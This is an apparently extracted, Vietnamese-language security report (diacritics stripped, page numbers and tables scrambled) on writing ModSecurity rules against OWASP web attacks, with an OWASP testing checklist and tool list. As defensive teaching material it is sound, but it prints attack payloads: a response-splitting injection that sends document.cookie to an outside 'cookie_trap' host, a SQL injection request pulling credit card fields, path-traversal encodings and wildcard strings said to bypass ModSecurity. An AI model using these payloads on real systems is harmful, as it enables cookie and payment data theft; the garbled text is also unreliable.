[9] Added regex subexpression to TX.1: 69d032331009e7b0
[4] Operator completed in 58 usec.
[9] Resolved macro %{TX.1} to: 69d032331009e7b0
Variable Manipulation
Hu ht cc d liu m ModSecurity phn tch s c thao tc ch ch c (d liu
tnh hoc khng thay i). Tuy nhin, ModSecurity cng h tr vic to ra cc bin c gi tr
thay i nhm phc v mt s mc ch c th.
Ta c th to ra mt bin bng cch s dng hnh vi setvar:
SecAction nolog,pass,setvar:tx.score=1
SecAction nolog,pass,setvar:!tx.score
SecAction nolog,pass,setvar:tx.score=+2
action.
SecAction nolog,pass,setvar:tx.score=-1
action.
Metadata
Metadata c dng trong rule vi mc ch hin th thng tin chi tit v cnh bo m rule
to ra. Cc thng tin ny khng gy nh hng n qu trnh phn tch d liu. Tuy nhin,
metadata s h tr bn d dng qun l cc cnh bo trong qu trnh phn tch log, gip xc
nh nhanh chng nguyn nhn v cch phng trnh cc khai thc vo web server.
Ti s bt u vi rule n gin nh sau:
SecRule REQUEST_METHOD "!^(GET|HEAD)$" \
Id:10001,phase:1,t:none,log,block
Vi cc tham s nh trn, th rule 10001 vn hot ng n nh khi trng mu. Tuy nhin,
d liu sau khi phn tch khng cung cp thng tin chi tit v thng tin k thut, cc hng
dn x l v.v
[22/Jun/2013:01:21:57 +0700] [www.modsec.com/sid#139efb0][rid#1606370][/][2]
Warning. Match of "rx ^(GET|HEAD)$" against "REQUEST_METHOD" required. [file
"/opt/modsecurity/etc/crs/activated_rules/addingMetadata.conf"] [line "1"] [id "10001"]
rule 10001 c m t tt hn v thng bo li, ti s ty bin rule li nh sau:
SecRule REQUEST_METHOD "!^(GET|HEAD)$" \
39
"phase:1,t:none,log,block,id:1001,rev:2,\
severity:WARNING,msg:'Request method is not allowed'"
Trong thng bo log, ta c th ghi nhn thay i:
[22/Jun/2013:01:28:19 +0700] [www.modsec.com/sid#17f1fb0][rid#1a59350][/][2]
Warning. Match of "rx ^(GET|HEAD)$" against "REQUEST_METHOD" required. [file
"/opt/modsecurity/etc/crs/activated_rules/addingMetadata.conf"] [line "3"] [id "10001"] [rev
"2"] [msg "Request method is not allowed"] [severity "EMERGENCY"]
#rev: xc nh phin bn thay i ca rule
#msg: d liu m t v rule
#severity: thng bo mc nguy him khi c cuc tn cng vo h thng web (mc
nguy him nht l EMERGENCY (1) v t nguy him nht l DEBUG (7).
XI.
Trng hp 1: Chng tn cng Replay attack thng qua c ch nh token ngu nhin.
Tham kho DANH MC L HNG BO MT OWASP 2010: Replay Testing (OWASPWS-007)
Trong phn ny, ti s phn tch trng hp hn ch vic khai thc vo cc form html. Vic
s dng phng thc POST nhn d liu t pha ngi dng thng to ra nguy c gi tin
b thay i trn ng truyn, nhm thc hin thm/bt d liu phc v cho tng loi tn cng
khc nhau.
thc hin chng li phng php tn cng ny, ta cn tham kho cc ch th m
ModSecurity h tr:
SecDisableBackendCompression
SecContentInjeciton
SecStreamOutBodyInspection
SecHashEngine
SecHashKey
SecHashParam
SecHashMethodRx
Phng php ny s cho php chn mt token kim tra vo d liu HTML khi web server
(Apache) tr kt qu v pha ngi dng. Bng cch s dng hm bm trn cc tham s
trong phn thn HTML, ModSecurity s chng li vic chnh sa thng tin trn knh
truyn. Bn di l cc rule v cc ch th h tr:
#vi /opt/modsecurity/etc/crs/activated_rules/case1_PreventDataManipulation.conf
40
SecContentInjection On
SecStreamOutBodyInspection On
SecHashEngine On
SecHashKey rand keyOnly
SecHashParam rv_token
SecHashMethodrx "HashHref" "[a-zA-Z0-9]"
SecRule REQUEST_URI "@validateHash [a-zA-Z0-9]"
"phase:2,id:1000,t:none,block,msg:'Request Validation Violation.',ctl:HashEnforcement=On"
Ch th u tin SecDisableBackendCompression ch c s dng trong trng hp
ModSecurity c trin khai nh mt reverse proxy. D liu tr v ngi dng s c nn
bng thut ton gzip nhm gim lu lng bng thng. Cc ch th SecEncryption tip theo
nhm thng bo cho ModSecurity to ra chui gi tr bm (hash value) ngu nhin da trn
hash salt value v thnh t href trong phn thn HTML (xc nh da trn mu c nh
ngha regular expression).
41
URL
http://www.modsec.com/2013/05/owasp-top-10-tools-and-tactics/?
rv_token=f3f6de81f7e3014ff6c4c6affce95caaca29e75e
http://www.modsec.com/2013/05/owasp-top-10-tools-and-tactics/%20and
42
token
%20union%20select%201,2,3,4,5,6
Trong trng hp hacker c tnh loi b token chn khai thc vo URL th rule c id 1000
s c so trng v to cnh bo ti audit_log.
[Wed Jun 05 18:12:16 2013] [error] [client 192.168.149.1] ModSecurity: Access allowed
(phase 2). Request URI matched "[a-zA-Z0-9]" at REQUEST_URI. No Hash parameter [file
"/opt/modsecurity/etc/crs/activated_rules/case1_PreventDataManipulation.conf"] [line "7"]
[id "1000"] [msg "Request Validation Violation."] [hostname "www.modsec.com"] [uri
"/2013/05/owasp-top-10-tools-and-tactics/ and union select 1,2,3,4,5,6"] [unique_id
"Ua8dEH8AAAEAAAyJBzMAAAAE"]
Trng hp 2: Pht hin cc Session cookie khng hp l
Tham kho DANH MC L HNG BO MT OWASP 2010: Testing for Session
Fixation (OWASP-SM-003)
Trong trng hp ny, ti s phn tch trng hp hacker c gng t to Seesion Cookie
khai thc theo phng php Session Fixation.
Mt s thnh phn tham kho:
o
o
o
o
43
44
45
"chain,t:none,t:sha1,t:hexEncode,capture,setvar:session.csrf_token=%{TX.1}"
SecRule REMOTE_ADDR "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)"
"chain,capture,setvar:session.ip_block=%{tx.1}"
SecRule REQUEST_HEADERS:User-Agent ".*"
"t:none,t:sha1,t:hexEncode,setvar:session.ua=%{matched_var}"
Theo mc nh, th rule 981062 s tm nhng tn cookie ph bin nh:
WORDPRESSPASS
SESSIONID
JSESSIONID
SESSID
PHPSESSID
SESSION
SESSION_ID
SESSION-ID
ASPSESSION
JSERVSESSION
JWSESSION
CFID
CFTOKEN
CFSID
o
o
o
o
o
Phng thc khai thc ny thc hin bng cch chn d liu hoc HTTP request gi vo mt
HTTP header khc. Vic ny dn n kt qu ti pha ngi dng s nhn 2 phn d liu khc
nhau trong cng 1 trang HTML, l tin cho cc khai thc Cross-user defacement, Cache
Poisioning, XSS, Page Hijacking.
Di y l mt v d trong m ngun PHP:
<?php
48
Nu ti pha ngi dng, hacker c tnh chn k t Carriage Return (CR) hoc Linefeed
(LF) vo cc tham s trong URL, th dn n kt qu gi tin ti pha ngi dng b ti cu trc
theo mc ch ca hacker.
Trong bng di y m t dng tn cng DOM XSS bng cch chn on HTML vo pha
ngi dng cui, tuy nhin vic to mt gi tin chn vo pha ngi dng l kh phc tp.
GET /index.php?language=english
Cotent-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 171
<html><body%20onload='document.location.replace
%20("http://www.swpag.info/cookie_trap/"%252b%20document.cookie
%252b"/URL/"%252bdocument.location);'></body></html> HTTP/1.1
Bng cch s dng k t %0d v/hoc %0a th ta c th chuyn ton b gi tin trn thnh
mt URL duy nht:
GET /index.php?language=english%0aCotent-Length:%200%0a
%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length
%20171:%0a%0a<html><body%20onload='document.location.replace
%20("http://www.swpag.info/cookie_trap/"%252b%20document.cookie
%252b"/URL/"%252bdocument.location);'></body></html> HTTP/1.1
phng chng li dng tn cng HTTP Reponse spliting, ta c th s dng rule nh sau:
# HTTP Response Splitting
#
# -=[ Rule Logic ]=# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters.
# These characters may cause problems if the data is returned in a respones header and
# may be interpreted by an intermediary proxy server and treated as two separate
# responses.
49
#
# -=[ References ]=# http://projects.webappsec.org/HTTP-Response-Splitting
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|
REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[\n\r](?:content-(type|
length)|set-cookie|location):" \
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'9',t:none,t:lowercase,capture,
ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting
Attack',id:'950910',logdata:'Matched Data: %{TX.0} found within %
{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%
{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%
{tx.0}"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|
REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\bhttp\/(?:0\.9|1\.[01])|
<(?:html|meta)\b)" \
"phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntity
Decode,t:lowercase,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting
Attack',id:'950911',logdata:'Matched Data: %{TX.0} found within %
{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%
{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%
{tx.0}"
Trng hp 4: Phng chng phng php khai thc Path-Traversal
Tham kho DANH MC L HNG BO MT OWASP 2010: Testing for Path Traversal
(OWASP-AZ-001)
Cc thnh phn tham kho:
o
o
o
o
Path traversal l mt phng php khai thc da vo thao tc trn URL nhm truy cp bt
hp php vo cc tp tin ti server. Hu ht cc nguyn nhn gy li l do pha m ngun web
cho php c d liu t mt tp tin khc, bng cch thay i gi tr ng dn trong chc nng
50
Example
%2f%2e%2e%2f
%c0%af%c0%ae%c0%ae%c0%af
%e0%80%af%e0%80%ae%e0%80%ae
%e0%80%af
%252f%252e%252e%252f
%%32%46%%32%45%%32%45%%32%46
%%32F%%32E%%32E%%32F
%2%46%2%45%2%45%2%46
%u002f%u002e%u002e%u002f
51
ModSecurity
@verifyCCoperator
OWASP ModSecurity Core Rule Set
modsecurity_crs_25_cc_known.conf
Vic r r thng tin ngi dng nh l s th tn dng (credit card number) l kh nghim
trng i vi cc ng dng thanh ton in t, cng nh cc gii php ngn hng. Thng
thng, vic l thng tin thng l kt qu ca cc cuc tn cng SQL injection c mc ch
vo cc trang thng mi in t, nhm n cp thng tin nh danh thanh ton ca ngi dng.
Di y l mt v d thc t v vic n cp thng tin ca mt ng dng web:
GET /cart/loginexecute.asp?LoginEmail='%20or
%201=convert(int,(select
%20top
52
%201%20convert(varchar,isnull(convert(varchar,OR_OrderDat
e),'N
ULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderID),
'N
ULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_FirstNam
e),
'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_LastNam
e)
,'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderAd
d
ress),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_Ord
erCity),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_O
rderZip),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_
OrderState),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(varchar,
OR_OrderCountry),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(var
char,OR_CCardName),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert(v
archar,OR_CCardType),'NULL'))
%2b'/'%2bconvert(varchar,isnull(convert
(varchar,OR_CCardNumberenc),'NULL'))
%2b'/'%2bconvert(varchar,isnull(
convert(varchar,OR_CCardExpDate),'NULL'))
%2b'/'%2bconvert(varchar,is
null(convert(varchar,OR_CCardSecurityCode),'NULL'))
%2b'/'%2bconvert(
varchar,isnull(convert(varchar,OR_Email),'NULL'))
%2b'/'%2bconvert(va
rchar,isnull(convert(varchar,OR_Phone1),'NULL'))%20from
%20Orders%20w
here%20OR_OrderID=47699))--sp_password HTTP/1.1
Accept: image/gif,image/xxbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
53
Cookie:
ASPSESSIONIDCCQCSRDQ=EHEPIKBBBFLOFIFOBPCJD
BGP
Host: www.banking.com
X-Forwarded-For: 14.0.18.205
Connection: Keep-Alive
Cache-Control: no-cache, bypass-client=14.0.18.205
Trong cu truy vn SQL trn, hacker thu thp d liu c nhn ca ngi dng ti cc table
c in m. Cc rule trong nhm khai thc SQL injection c th chng li dng tn cng ny,
nhng cn ch rng cc rule pht hin SQL injection ch ch theo di (Detect-only). Sau
khi cu truy vn SQL c thc thi ti pha server, th gi tr tr v ngi dng vn cha thng
tin ca th tn dng (bao gm: tn ch th,loi th, s th, thi gian s dng).
HTTP/1.1 500 Internal Server Error
Content-Length: 573
Content-Type: text/html
Cache-control: private
Connection: close
o
o
Trong phn minh ha khai thc bruteforce, ti s dng module Intruder trong phn mm
Burp Suite. Module ny cho php ngi dng ty bin d liu gi tin HTTP v sau thc
hin gi ni dung n server.
55
Hnh 12: Giao din Burp Suite v ni dung ng nhp Wordpress CMS
Trong phn ng nhp nh hnh trn, ti ch nh tham s pwd s l ni thc hin chn cc
gi tr password trong qu trnh bruteforce.
56
57
61
XII.
PH LC
NHM
STT
TN L HNG
THAM CHIU
1
2
3
4
5
6
OWASP-IG-001
OWASP-IG-002
OWASP-IG-003
OWASP-IG-004
OWASP-IG-005
OWASP-IG-006
OWASP-CM-001
OWASP-AT-001
8
9
10
11
12
13
14
15
16
17
18
19
62
OWASP-CM-002
OWASP-CM-003
OWASP-CM-004
OWASP-CM-005
OWASP-CM-006
OWASP-CM-007
OWASP-CM-008
OWASP-AT-002
OWASP-AT-003
OWASP-AT-004
OWASP-AT-005
20
OWASP-AT-006
22
23
24
25
26
27
28
29
OWASP-SM-001
OWASP-SM-002
OWASP-SM-003
OWASP-SM-004
OWASP-SM-005
30
31
32
OWASP-AZ-001
OWASP-AZ-002
OWASP-AZ-003
33
OWASP-BL-001
34
35
36
OWASP-DV-001
OWASP-DV-002
OWASP-DV-003
TESTING BUSINESS
AUTHORIZATION TESTING SESSION MANAGEMENT
AUTHENTICATION TESTING
LOGIC
21
63
OWASP-AT-007
OWASP-AT-008
OWASP-AT-009
OWASP-AT-010
AJAX
WEB SERVICES TESTING DENIAL OF SERVICE
DATA
TESTING
VALIDATION TESTING
TESTING
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
OWASP-DV-004
OWASP-DV-005
OWASP-DV-006
OWASP-DV-007
OWASP-DV-008
OWASP-DV-009
OWASP-DV-010
OWASP-DV-011
OWASP-DV-012
OWASP-DV-013
OWASP-DV-014
OWASP-DV-015
OWASP-DV-016
OWASP-DS-001
OWASP-DS-002
OWASP-DS-003
OWASP-DS-004
OWASP-DS-005
OWASP-DS-006
OWASP-DS-007
OWASP-DS-008
58
59
60
61
62
63
64
WS Information Gathering
Testing WSDL
XML Structural Testing
XML content-level Testing
HTTP GET parameters/REST Testing
Naughty SOAP attachments
Replay Testing
OWASP-WS-001
OWASP-WS-002
OWASP-WS-003
OWASP-WS-004
OWASP-WS-005
OWASP-WS-006
OWASP-WS-007
65
AJAX Vulnerabilities
OWASP-AJ-001
66
AJAX Testing
OWASP-AJ-002
64
Category
OS
Wikto
Wind
ows
Nikto
Linux
Paros
Web App
Proxy
TamperIE
Data
Tampering
Nessus
Vulnerabil
ity Scanner
Wind
ows
Comments
Link
http://www.sensepo
st.com/research/wikto
/
http://www.nessus.
org
65
Nmap
Wget
e
SamSpad
Spike
Proxy
Xenu
Curl
OpenSSL
Web
Server
Assessment
Tool
Web
Mirroring
Web
Spidering
Web
Crawler
Secure
FTP
Encryptio
http://curl.haxx.se/
n tools
BURP
Proxy
SSLDigge
r
HTTrack
HTTPrint
Web
Vulnerability
Scanners
Encryptio
n tools
Webserve
r
Fingerprinti
ng tool
the ciphers
Burp Proxy is an interactive HTTP/S proxy server
for attacking and testing web applications. It
operates as a man-in-the-middle between the end
browser and the target web server, and allows the
user to intercept, inspect and modify the raw
traffic passing in both directions.
Burp Proxy allows you to find and exploit
application vulnerabilities by monitoring and
manipulating critical parameters and other data
transmitted by the application. By modifying
browser requests in various malicious ways, Burp
Proxy can be used to perform attacks such as SQL
injection, cookie subversion, privilege escalation,
session hijacking, directory traversal and buffer
overflows.
SSLDigger v1.02 is a tool to assess the strength
of SSL servers by testing the ciphers supported.
Some of these ciphers are known to be insecure.
httprint is a web server fingerprinting tool. It
relies on web server characteristics to accurately
identify web servers, despite the fact that they
may have been obfuscated by changing the
server banner strings, or by plug-ins such as
mod_security or servermask. httprint can also be
used to detect web enabled devices which do not
have a server banner string, such as wireless
access points, routers, switches, cable modems,
etc. httprint uses text signature strings and it is
67
Webscara
b
Web
Vulnerability
Analysis
Foundsto
ne Cookie
Digger
DANH MC THAM KHO KHAI THC L HNG BO MT NG DNG WEB
Catego
ry
Inform
ation
Gatherin
Ref.
Number
IG-001
Test
Name
Spiders,
Robots and
Crawlers
Vulne
rability
N.A.
Comment
Tests
Tools
s
Analyze Robots with Google
Webmaster,
68
HTTrack,Wikt
o/Nikto
IG-002
Search
Engine
Discovery/R
econnaissa
nce
N.A.
IG-003
Identify
application
entry points
N.A.
IG-004
Testing
for Web
Application
Fingerprint
Applicatio
n Discovery
N.A.
WebServe
r Details
Enumeration
N.A.
find
Applications
hosted in
the
webserver,
non
standard
ports,
IG-005
IG-006
Configu
CM
ration
001
Manage
Analysis
of Error
Codes
SSL/TLS
Testing (SSL
Version,
Informatio
n obtained
with help of
Search
Engines
Inform
Grab
ation
information
Disclosur disclosed in
e
error codes
SSL W
eakness
69
Goolag
scanner,
Google
Hacking db
(Johny),
Goolge, Kartoo
Paros,
Webscarab,
Tamper IE,
Tamper Data
HTTP Print,
NetCraft
nMap,telnet,
nessus,
host, Netcraft
Search DNS se
rvice, DNS
Stuff Reverse
IP Lookup,
nslookup,
wikto
Software
Proxies, Wikto
nMap,
Nessus,
OpenSSL,
ment
Testing
CM
002
CM
003
CM
004
Algorithms,
Key length,
Digital Cert.
Validity) SSL
Weakness
DB
Listener
Testing - DB
Listener
weak
Infrastruc
ture
Configuratio
n
Managemen
t Testing Infrastructu
re
Configuratio
n
manageme
nt
weakness
Applicatio
n
Configuratio
n
Managemen
t Testing -
SSLDigger
DB List
For
ener wea Intranet
k
sites
Infrast
ructure
Configur
ation ma
nageme
nt weakn
ess
Config
managemen
t for
webserver
software,
back-end
database
servers,
auth
servers.
Applic
ation Co
nfigurati
on mana
gement
weaknes
Make sure
that all the
configuratio
n guidelines
are followed
70
Integrigy
lsnrcheck,
LSNRCTL, TNS
Listener
CM
005
CM
006
Application s
Configuratio
n
manageme
nt
weakness
Testing
File ex
for File
tensions
Extensions
handling
Handling File
extensions
handling
Old,
backup and
unreference
d files - Old,
backup and
unreference
d files
Determini
ng how web
servers hand
le requests c
orrespondin
g to files hav
ing different
extensions
may help to
understand
web server b
ehaviour de
pending on t
he kind of fil
es we try to
access(.asa,
.inc, .db)
Old, b
Accessing
ackup an and
d unrefer downloading
enced fil the backup
es
files which
can escape
the file
71
Curl, wget,
web mirroring
tool, Nessus,
Nikto
HTTrack,Wikt
o/Nikto,
Goolag, Spike
Proxy
restrictions
Authen
tication
Testing
CM
007
Infrastruc
ture and
Application
Admin
Interfaces Access to
Admin
interfaces
CM
008
Testing
for HTTP
Methods
and XST HTTP
Methods
enabled,
XST
permitted,
HTTP Verb
Credentia
ls transport
over an
encrypted
channel -
AT-001
Access
Try to
to Admin exploit the
interface admin
s
functions
such as User
Allocation,
Site
design/layou
t, Data
manipulatio
n, Configs
HTTP
Methods
enabled,
XST per
mitted,
HTTP Ver
b
Netcat,
TamperIE,
Webscarab etc
Crede
ntials tra
nsport o
ver an e
ncrypted
Wireshark,
Proxy
72
Webscarab,
AT-002
Credentials
transport
over an
encrypted
channel
Testing
for user
enumeratio
n - User
enumeratio
n
AT-003
Testing
for
Guessable
(Dictionary)
User
Account Guessable
user
account
AT-004
Brute
Force
Testing Credentials
channel
User e
Enumerat
numerati e all possible
on
valid userids
by
interacting
with the
authenticati
on
mechanism
of the
application
Guess
able use
r accoun
t
Crede
ntials Br
ute forci
ng
73
Webscarab
Brutus, THC
Hydra, Burp
Intruder, Cain
& Abel
Brutus, THC
Hydra, Burp
Intruder, Cain
& Abel, John
Brute
forcing
AT-005
AT-006
Testing
for
bypassing
authenticati
on schema Bypassing
authenticati
on schema
Testing
for
vulnerable
remember
password
and pwd
reset Vulnerable
remember
password,
weak pwd
reset
Bypas
sing aut
henticati
on sche
ma
Vulner
able rem
ember p
assword,
weak pw
d reset
Understan
d the
password
reset
procedure,
the secret
questions
asked etc
74
the Ripper,
OPHCRACK,
Rainbow Tables
Webscarab
AT-007
AT-008
Testing
for Logout
and
Browser
Cache
Managemen
t - - Logout
function not
properly
implemente
d, browser
cache
weakness
Testing
for
CAPTCHA Weak
Captcha
implementa
tion
Logout
function
not prop
erly impl
emented
, browser
cache w
eakness
Session
timeout,
Logout etc
implemente
d
Weak
Captcha
impleme
ntation
Completel
y Automated
Public Turing
75
HTTP.Session.invalidate()-Java,
Java.Session.abandon()-.Net
implemented. Press back
button/reload check,check
presense of logout btns in all
page, User browser closed
instead of session invalidate
check,insert Set-Cookie check,
Time out interval, Timeout not
by client check,Modify the
session expiration time at
clientside, Check META CacheControlin HTML,
CAPTCHA Image Complexity,
Set of possible
answers,Analysing the return
encrypted Captcha code,
identify the parameters, Reuse
the session id of known
CAPTCHA, Send old CAPTCHA
value with old ID,Send old
decoded CAPTCHA value with
old session id
Webscarab,
Add N Edit
Cookies
CAPTCHA
Decoders
-PWNtcha,The
Captcha
Breaker,
Captcha
Decoder,
Online Captcha
Decoder.
AT-009
Testing
Multiple
Factors
Authenticati
on - Weak
Multiple
Factors
Authenticati
on
Weak
Multiple
Factors A
uthentic
ation
Onetime
password (O
TP) generato
r token.
Grid Card,
Scratch Card
, or any infor
mation that
only the legi
timate user i
s supposed t
o have in his
wallet
Crypto devi
ces like USB
tokens or sm
art cards, eq
uipped with
X.509 certifi
cates.
Randomly
generated O
TPs transmit
ted through
a GSM SMS
messages [S
MSOTP]
76
AT-010
Session
SMManage
001
ment
Testing
for Race
Conditions Race
Conditions
vulnerabilit
y
Race C
A race con
onditions dition is a fla
vulnerab w that produ
ility
ces an unex
pected resul
t when the ti
ming of acti
ons impact o
ther actions.
An example
may be seen
on a multithr
eaded applic
ation where
actions are b
eing perform
ed on the sa
me data. Ra
ce condition
s, by their
very nature,
are difficult t
o test for
Testing
Bypas
CookieColl
for Session
sing Ses ection,Cooki
Managemen sion Man eReverseEn
t Schema agement gineering,Co
Bypassing
Schema, okieManipul
Session
Weak Se ation.
Managemen ssion Tok
77
Unencrypted Cookie
Transport,Presence of persistent
cookies,Cache-Control Settings,
SessionID Analysis-SensitiveInfo,
Randomness, Cryptanalysis,
BruteForce
Webscarab,B
urpProxy,
FoundStone
Cookie Digger
SM002
SM003
SM004
t Schema,
Weak
Session
Token
en
Testing
for Cookies
attributes Cookies are
set not
HTTP Only,
Secure,
and no time
validity
Testing
for Session
Fixation Session
Fixation
Cookie
s are set
not HTT
P Only,
Secure,
and no ti
me validi
ty
Testing
for Exposed
Session
Variables Exposed
sensitive
session
Expos
ed sensit
ive sessi
on varia
bles
Sessio
n Fixatio
n
";secure",
HTTPOnly - Always set,
"; domain=app.mysite.com",
"; path=/myapp/",
expires-Future Value => inspect
for sensitive data
The
application
doesnt
renew the
cookie after
auth
-Session
hijacking
Webscarab
78
Webscarab,B
urpProxy,Paros
,
TamperIE/Data
variables
SM005
Authori
zation
Testing
Testing
for CSRF CSRF
AZ-001
Testing
for Path
Traversal Path
Traversal
AZ-002
Testing
for
bypassing
authorizatio
n schema Bypassing
authorizatio
n schema
CSRF
Path Tr
aversal
Bypas
sing aut
horizatio
n
schema
79
Grep, Nikto,
Burp Suite,
Paros,
Webscarab
AZ-003
Testing
for Privilege
Escalation Privilege
Escalation
Privile
ge Escal
ation
vertical es
Testing for role/privilege mani
calation whe pulatio - Manipulate the values
n it is possib of hidden variables , analyse the
le to access
error messages etc
resources gr
anted to mo
re privileged
accounts (e.
g.,
acquiring ad
ministrative
privileges fo
r the applica
tion), and to
horizontal es
calation whe
n it is possib
le to access
resources
granted to a
similarly con
figured acco
unt (e.g., in
an online ba
nking applic
ation, acces
sing informa
tion related t
o a different
user).
80
Proxy Tools
Busine
ss logic
testing
BL-001
Testing
Bypas
for Business sable bu
Logic siness
Bypassable logic
business
logic
Data
Validatio
n Testing
DV-001
Testing
for
Reflected
Cross Site
Scripting Reflected
XSS
DV-002
Testing
for Stored
Cross Site
Scripting Stored XSS
Bypass
the actual
workflow
required to
complete a
process
Reflect
Check for
ed XSS
input
validation,
try out
different
combination
s of XSS
vectors
Stored
Impacts
XSS
*Hijacking a
nother user'
s browser
*Capturing s
ensitive info
rmation vie
wed by appli
cation users
*Pseudo def
acement of t
he applicatio
n
*Port scanni
81
Automated
tools fails
CAL9000,
Rsnake XSSdb,
XSSMe firefox
addon, XSS
proxy,
WebScarab,
Rat proxy, Burp
Proxy
CAL9000,
Hackvertor,
XSSProxy,
BeEF,
WebScarab
ng of interna
l hosts ("inte
rnal" in relat
ion to the us
ers of the w
eb applicatio
n)
*Directed de
livery of bro
wserbased
exploits
*Other malic
ious activitie
s
DV-003
Testing
DOM X
This
for DOM
SS
happens
based Cross
mostly due
Site
to poor
Scripting javascript
DOM XSS
coding.
DV-004
Testing
Cross
Working
for Cross
Site Flas for
Site
hing
actionscript
Flashing 2.0 files
Cross Site
Flashing
82
Automated
tools fails
1.Decompile
2.Undefined Variables
3.Unsafe methods
4.Include malicious SWF
SWFIntruder,
Flare, Flasm
DV-005
SQL
Injection SQL
Injection
DV-006
LDAP
Injection LDAP
Injection
DV-007
ORM
Injection ORM
Injection
SQL Inj
1.Inband
ection
(retrieved
data in the
webpage)
2.Out-ofband (data
sent through
email or
other
means)
3.Inferential
(Analyse the
behaviour of
Dbserver)
LDAP I
njection
ORM I
njection
Object
Relational
Mapping
tool. ORM
tools include
Hibernate
for Java,
NHibernate
for .NET,
83
Test Categories
1.Authentication Forms,
2.Search Engine,
3.E-Commerce sites
Tests
1.Heuristic Analysis(' , : , --)
2.Construct SQL Injection
Vectors
3.Analyse Error Messages
Ability to
Access unauthorized content
Evade Application restrictions
Gather unauthorized
information
Add or modify Objects inside
LDAP tree structure.
Black box testing for ORM
Injection vulnerabilities is
identical to SQL Injection testing
OWASP
SQLiX
SQL Power
Injector
sqlbftools
sqlmap
SqlDumper
sqlninja
Softerra
LDAP Browser
ActiveRecor
d for Ruby
on Rails,
EZPDO for
PHP and
many
others.
DV-008
XML
XML In
Injection jection
XML
Injection
DV-009
SSI
SSI Inj
Injection ection
SSI Injection
DV-010
XPath
Injection XPath
Injection
XPath I
Unlike
njection
SQL,
there are
not ACLs
enforced, as
our query
can access
every part of
the XML
document
84
Burp Suit,
WebScarab,
Paros
DV-011
DV-012
IMAP/SMT
P Injection IMAP/SMTP
Injection
Code
Injection Code
Injection
DV-013
OS
Commandin
g - OS
Commandin
g
IMAP/S
MTP Inje
ction
Exploitation of vulnerabilities
in the IMAP/SMTP protocol
Application restrictions evasion
Anti-automation process
evasion
Information leaks
Relay/SPAM
Code I
njection
OS Co
mmandi
ng
85
Webscarab
DV-014
DV-015
Buffer
overflow Buffer
overflow
Incubated
vulnerabilit
yIncubated
vulnerabilit
y
DV-016
Testing
for HTTP
Splitting/Sm
uggling HTTP
Splitting,
Smuggling
Buffer
overflow
Testing
for heap
overflow
vulnerability
Testing for
stack
overflow
vulnerability
Testing for
format
string
vulnerability
Incuba
ted vuln
erability
HTTP S
Outcome plitting,
Cache
Smuggli Poisoning/XS
ng
S
param=foobar%0d
%0aContent-Length:
%200%0d%0a%0d
%0aHTTP/1.1%20200%20OK
%0d%0aContentType:%20text/html%0d
%0aContent-Length:
%2035%0d%0a%0d
%0a<html>Sorry,%20System
%20Down</html>
86
OllyDbg,
Spike, Brute
Force Binary
Tester (BFB),
Metasploit.
RATS,
Flawfinder and
ITS4 are
available for
analyzing Cstyle
languages
XSS-proxy,
Paros, Burp,
Metasploit
Denial
of
Service
Testing
DS-001
Testing
for SQL
Wildcard
Attacks SQL
Wildcard
vulnerabilit
y
DS-002
Locking
Customer
Accounts Locking
Customer
Accounts
SQL Wi
Starting
ldcard
with % and
vulnerab ending with
ility
% will
generally
cause longer
running
queries.
Some
search
implementat
ions may
cache
search
results.
During the
testing,
every search
query should
be slightly
different to
avoid this.
Lockin
g Custo
mer
Accounts
87
'%_[^!_%/%a?F%_D)_(F%)_
%([)({}%){()}$&N%_)$*()
$*R"_)][%](%[x])%a][$*"$-9]_
%'
'%64_[^!_%65/%aa?F
%64_D)_(F%64)_%36([)({}%33)
{()}$&N%55_)$*()$*R"_)]
[%55](%66[x])%ba
][$*"$-9]_%54' bypasses
modsecurity
_[r/a)_ _(r/b)_ _(r-d)_
%n[^n]y[^j]l[^k]d[^l]h[^z]t[^k
]b[^q]t[^q][^n]!%
%_[aaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaa[! -z]@$!_%
Wrong Attempts
Valid Username enumeration Login Page, New User Reg Page,
Password Reset Page
DS-003
Testing
for DoS
Buffer
Overflows Buffer
Overflows
Buffer
Overflow
s
DS-004
User
Specified
Object
Allocation User
Specified
Object
Allocation
User S
pecified
Object Al
location
if you
have
received a
response (or
a lack of)
that makes
you believe
that the
overflow has
occurred,
attempt to
make
another
request to
the server
and see if it
still
responds.
If the
application does not pose an
upper limit to the number of
items that can be in any given
moment inside the user
